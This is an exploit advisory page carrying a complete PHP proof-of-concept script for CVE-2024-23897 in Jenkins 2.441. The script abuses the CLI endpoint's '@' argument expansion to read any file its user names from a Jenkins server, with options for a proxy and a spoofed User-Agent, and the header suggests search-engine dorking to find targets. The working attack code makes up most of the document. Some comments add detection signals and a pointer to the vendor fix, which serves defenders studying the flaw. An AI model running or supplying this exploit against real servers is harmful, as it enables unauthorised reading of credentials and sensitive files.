Jenkins 2.441 Arbitrary File Read
=============================================================================================================================================
| # Title Jenkins 2.441 Arbitrary File Read
=============================================================================================================================================
| # Title : Jenkins 2.441 read files Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://www.jenkins.io/changelog/2.441/ |
=============================================================================================================================================
POC :
[+] Dorking in Google or other search engine.
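[+] Code Description: reads a file from a Jenkins server through its CLI endpoint
(Related: https://packetstorm.news/files/id/188696/ ; related CVE number: CVE-2024-23897). Remediation is the vendor fix for that CVE; the Jenkins security advisory lists the fixed releases.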
[+] save code as poc.php.
[+] Usage: php script.php -u <Jenkins URL> -f <file path> [-p <proxy>]
[+] PayLoad :
<?php
// Turn off TLS certificate and host-name verification on the default stream
// context. Any stream that relies on that context cannot authenticate the
// server: a response may come from, or be altered by, an on-path party.
stream_context_set_default([
    'ssl' => [
        'verify_peer'      => false,
        'verify_peer_name' => false,
    ],
]);

// ANSI colour escape sequences for terminal output. None of the four is
// referenced in the visible part of the script.
const RED    = "\033[91m";
const GREEN  = "\033[92m";
const YELLOW = "\033[93m";
const ENDC   = "\033[0m";

// Character-set name; passed to jenkins_arg() with operation 2 when the
// upload request body is built.
const ENCODING = "UTF-8";
/**
 * Serialise one string as a binary frame in the layout this script sends to
 * the Jenkins CLI endpoint.
 *
 * Layout, in order: two zero bytes, a 16-bit big-endian value equal to the
 * string's byte length plus two, one byte holding the operation code, a
 * 16-bit big-endian byte length, then the raw bytes. Read together, the first
 * four bytes are a 32-bit big-endian length of everything that follows the
 * operation byte.
 *
 * Lengths are byte counts (strlen) packed as unsigned 16-bit values, so only
 * the low 16 bits of the length survive for very long strings.
 *
 * @param string $string    Payload to embed in the frame.
 * @param int    $operation Operation code; chr() reduces it to a single byte.
 * @return string The assembled frame.
 */
function jenkins_arg($string, $operation)
{
    $payloadLength = strlen($string);

    return "\x00\x00"
        . pack("n", $payloadLength + 2)
        . chr($operation)
        . pack("n", $payloadLength)
        . $string;
}
/**
 * Send the "upload" half of a CLI exchange: one POST to
 * <url>/cli?remoting=false whose body is a sequence of jenkins_arg() frames.
 *
 * The body holds, in order: "connect-node" (operation 0), "@" followed by
 * $file_path (operation 0), the ENCODING constant (operation 2), "en"
 * (operation 1) and an empty string (operation 3). The operation numbers
 * presumably map to argument / locale / encoding / start frames of the
 * Jenkins CLI protocol; confirm against the protocol source.
 *
 * CVE-2024-23897, which the page cites, concerns the CLI argument parser
 * replacing an "@"-prefixed argument with the contents of the named file.
 * For detection, this request is a POST to /cli?remoting=false carrying a
 * "Side: upload" header and an octet-stream body in which an argument frame
 * starts with "@".
 *
 * The call pauses 0.3 s before building the request (the source gives no
 * reason). Warnings are suppressed with "@" and the response is discarded.
 *
 * @param string $url       Base URL of the server; the CLI path is appended.
 * @param string $uuid_str  Value sent in the "Session" header.
 * @param string $file_path Path placed after "@" in the second frame.
 * @param string $useragent Value sent in the "User-Agent" header.
 * @param string $proxy     When truthy, used as the HTTP proxy with
 *                          request_fulluri enabled.
 * @return void
 */
function send_upload_request($url, $uuid_str, $file_path, $useragent, $proxy)
{
    usleep(300000);

    $frames = [
        jenkins_arg("connect-node", 0),
        jenkins_arg("@" . $file_path, 0),
        jenkins_arg(ENCODING, 2),
        jenkins_arg("en", 1),
        jenkins_arg("", 3),
    ];

    $httpOptions = [
        'method' => 'POST',
        'header' => [
            "User-Agent: $useragent",
            "Session: $uuid_str",
            "Side: upload",
            "Content-type: application/octet-stream",
        ],
        'content' => implode('', $frames),
        'timeout' => 3,
    ];

    if ($proxy) {
        $httpOptions['proxy'] = $proxy;
        $httpOptions['request_fulluri'] = true;
    }

    @file_get_contents(
        $url . "/cli?remoting=false",
        false,
        stream_context_create(['http' => $httpOptions])
    );
}
/**
 * Send the "download" half of a CLI exchange and turn the response into text.
 *
 * Issues a body-less POST to <url>/cli?remoting=false with the same "Session"
 * value as the upload request and a "Side: download" header. For detection,
 * the two POSTs to that path sharing one Session value, one per "Side", are
 * what this script puts on the wire.
 *
 * Response handling, first match wins:
 *  - contains "No such file:"  -> prints "File does not exist" and returns false;
 *  - contains "No such agent"  -> returns every quoted value captured after
 *    that phrase, joined with newlines;
 *  - otherwise                 -> returns the response with NUL bytes turned
 *    into newlines and surrounding whitespace trimmed.
 *
 * Warnings from the request are suppressed with "@", so a failed request is
 * not reported separately from an empty response.
 *
 * @param string $url       Base URL of the server; the CLI path is appended.
 * @param string $uuid_str  Value sent in the "Session" header.
 * @param string $useragent Value sent in the "User-Agent" header.
 * @param string $proxy     When truthy, used as the HTTP proxy with
 *                          request_fulluri enabled.
 * @return string|false Extracted text, or false when the server reports that
 *                      the file does not exist.
 */
function send_download_request($url, $uuid_str, $useragent, $proxy)
{
    $httpOptions = [
        'method' => 'POST',
        'header' => [
            "User-Agent: $useragent",
            "Session: $uuid_str",
            "Side: download",
        ],
        'timeout' => 3,
    ];

    if ($proxy) {
        $httpOptions['proxy'] = $proxy;
        $httpOptions['request_fulluri'] = true;
    }

    $response = @file_get_contents(
        $url . "/cli?remoting=false",
        false,
        stream_context_create(['http' => $httpOptions])
    );

    $fileMissing = strpos($response, "No such file:") !== false;
    if ($fileMissing) {
        echo "File does not exist\n";
        return false;
    }

    $agentErrors = strpos($response, "No such agent") !== false;
    if ($agentErrors) {
        preg_match_all('/No such agent \"(.*?)\"/', $response, $matches);
        // Group 1 holds the quoted values; an absent group yields "".
        return implode("\n", $matches[1] ?? []);
    }

    return trim(str_replace("\x00", "\n", $response));
}
/**
 * Run one upload/download exchange against the server and print the result.
 *
 * A fresh uniqid() value is used as the "Session" header on both requests.
 * Whatever send_download_request() returns is printed followed by a newline;
 * any falsy return (false, "" or "0") prints "<empty>" instead. When the
 * server reports a missing file, "File does not exist" has already been
 * printed by send_download_request(), so both lines appear.
 *
 * @param string $url       Base URL of the server.
 * @param string $file_path Path forwarded to send_upload_request().
 * @param string $useragent Value sent in the "User-Agent" header.
 * @param string $proxy     Optional HTTP proxy; falsy means none.
 * @return void
 */
function read_file($url, $file_path, $useragent, $proxy)
{
    $session_id = uniqid();

    send_upload_request($url, $session_id, $file_path, $useragent, $proxy);
    $result = send_download_request($url, $session_id, $useragent, $proxy);

    echo $result ? $result . "\n" : "<empty>\n";
}
// Command-line entry point: parse -u/--url, -f/--file and -p/--proxy, then
// make a single read_file() call.
$options = getopt("u:f:p:", ["url:", "file:", "proxy:"]);

// The short option wins over the long one; a missing option becomes ''.
$url   = $options['u'] ?? $options['url'] ?? '';
$file  = $options['f'] ?? $options['file'] ?? '';
$proxy = $options['p'] ?? $options['proxy'] ?? '';

// Fixed browser-like User-Agent sent on both requests. As a detection signal
// it is weak: the value is a plain string constant of this script.
$useragent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36";

// Both the URL and the file path are mandatory; otherwise print usage and stop.
if (!($url && $file)) {
    exit("Usage: php script.php -u <Jenkins URL> -f <file path> [-p <proxy>]\n");
}

read_file($url, $file, $useragent, $proxy);
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================